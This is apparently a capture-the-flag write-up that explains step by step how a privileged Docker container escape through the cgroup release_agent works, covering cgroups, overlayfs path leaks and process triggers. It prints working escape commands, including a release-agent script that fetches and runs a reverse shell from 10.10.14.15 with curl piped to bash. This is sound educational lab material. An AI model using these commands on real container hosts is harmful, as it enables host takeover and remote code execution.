Digging into cgroups Escape
The method I used in Ready to get code execution on the host system from a docker container running as privileged was a series of bash commands that didn’t make any sense on first glance. I wanted to dive into them and see what was happening under the hood.
The privileged Docker container escape POC I used looked like this:
root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.15/shell.sh | bash' >/c; root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
To explain how this works, I’ll use a slightly different version of the POC (from the same article) because it’s a bit easier to follow:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /cmd echo "curl 10.10.14.15/shell.sh | bash" >> /cmd chmod a+x /cmd sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"
Both POCs take the same steps:
- Find or create an access to the RDMA cgroup controller.
- Create a new cgroup within that controller.
notify_on_releasefor that cgroup, and set the release agent to a file accessible via both the container and host.
- Start a quickly completing process within that cgroup that triggers execution of the release agent on termination.
The first thing to understand is the idea of cgroups. It’s a Linux kernel feature that isolates CPU (and other resource) usage to a collection of processes within the cgroup. Julia Evans has a zine describing cgroups:
cgroups are not exclusive to Docker, but they are used by Docker. This neat Medium post on Docker Internals goes into a lot more detail about how Docker uses cgroups for resource allocation.
The other concept that comes into play here is overlayfs, a “union mount filesystem” implementation in Linux. In overlayfs, there are two directories, upper and lower, that are merged to create another directory that represents the combination of the two. Julia Evans has another really helpful zine for overlayfs (she’s such a good resource!):
Julia has a post that goes into more detail with examples as well. The idea is that you can mount two file paths such that they create a third merged result. For example, the lower might be a container base image, and the upper might be changes made inside the container. In the merged result, if the file exists in both upper and lower, it shows the one from upper. If it doesn’t exist in upper, it shows the one from lower.
What’s important to know here is that by leaking the host’s filepath to the upper directory used for the docker container, I can write something in the container, and know where it will be on the host.
Find / Create cgroup Controller
The first two commands (of three) in the first line in the POC is creating a directory, and mounting it as an RDMA cgroup controller (
mount -t cgroup -o rdma):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
It uses the RDMA cgroup, but others would works as well (there’s a list in the cgroups man page). In the Trail of Bits post they show an error that comes up when there is no RDMA cgroup, and suggest just changing
memory to continue in another cgroup.
The original POC finds an existing mount of the rdma cgroup controller using a somewhat obfuscated
root@gitlab:~# dirname $(ls -x /s*/fs/c*/*/r* |head -n1) /sys/fs/cgroup/rdma
cgroup controllers are global resources, and mounting it again here inside the container gives access to the same controller in the host. Changes made here will be reflected in the host’s RDMA controller. Without being privileged, a container won’t have access to this.
Create New cgroup
Next, each POC creates a cgroup (directory) in that mount,
w in the original POC):
mkdir -p $d/w;
On just creating the directory, several files are created:
root@gitlab:~# ls /tmp/cgrp/x/ cgroup.clone_children notify_on_release rdma.max cgroup.procs rdma.current tasks
The next command is to write a 1 to
notifiy_on_release, which enables cgroup notifications on release:
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the "release_agent" file in that hierarchy's root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup.
In each POC:
echo 1 > /tmp/cgrp/x/notify_on_release
echo 1 >$d/w/notify_on_release
The majority of the remaining commands are dedicated to setting the release agent. This is what will get run on the release notification. First, the POC needs to find the mapping so that the host can reference a file written in the container.
/etc/mtab has a list of all the mount points for the system, to include the overlayfs mount:
root@gitlab:~# grep upper /etc/mtab overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/GIXQ4D2FJ63I5OGALTCGDBK6KT:/var/lib/docker/overlay2/l/PZB5MARGIAOF6N5AAJNTVUFS52:/var/lib/docker/overlay2/l/4KSUGTOLFYSBJFJQH2NUGVL54R:/var/lib/docker/overlay2/l/PJ4IKL6MDRM2ZSGFRAXCVHVLUR:/var/lib/docker/overlay2/l/XLLFVBBMKEEE672BOIVTSZ5XQZ:/var/lib/docker/overlay2/l/33JTQXWWPTNINADNR6R3YM47KY:/var/lib/docker/overlay2/l/XG5BUSKVZNINSBJD2J7MMLU5A3:/var/lib/docker/overlay2/l/ZI5Y7RO6WUTDK3DQVTUTOA2ZWI:/var/lib/docker/overlay2/l/SRZJCUXAPFOW35HRDPW7OHQWXN:/var/lib/docker/overlay2/l/SLR2WWC4VRYMZRPZ6EHZQSLNYS:/var/lib/docker/overlay2/l/SJBEI24D42KKTO5Z54GMKQPPXO,upperdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff,workdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/work,xino=off 0 0
The next command in the POC uses
sed to get just the string that is the
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
Running that shows where on the host filesystem the container files are:
root@gitlab:~# sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab /var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff
As an experiment, I’ll create a file in the root home dir on the container:
root@gitlab:~# echo "0xdf was here" > 0xdf
With an SSH shell as root on the host, I can see that file shows up in the
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# ls bin etc home opt root root_pass run tmp usr var root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# cd root/ root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# ls 0xdf root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# cat 0xdf 0xdf was here
This helps because now I can write the release agent script (a simple reverse shell) in the container, and then call it from the host. That’s what the next few commands do. Set the file from the host’s perspective as the
echo "$host_path/cmd" > /tmp/cgrp/release_agent
Write the reverse shell from within the container:
echo '#!/bin/sh' > /cmd echo "curl 10.10.14.15/shell.sh | bash" >> /cmd chmod a+x /cmd
Now everything is set up so that when a process within this new cgroup terminates, it will execute the reverse shell. All I need to do now is start a process within that cgroup and then let it finish. The POC makes use of a neat trick to do that. It starts an
echo process, and has that process output the PID of that process into the
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"
This leads to the PID being in that file, and then that
echo completing, which terminates the process. The system sees that PID terminate, and finds it’s PID in the
x cgroup. It removes that PID from the
cgroups.procs file, and triggers the release agent.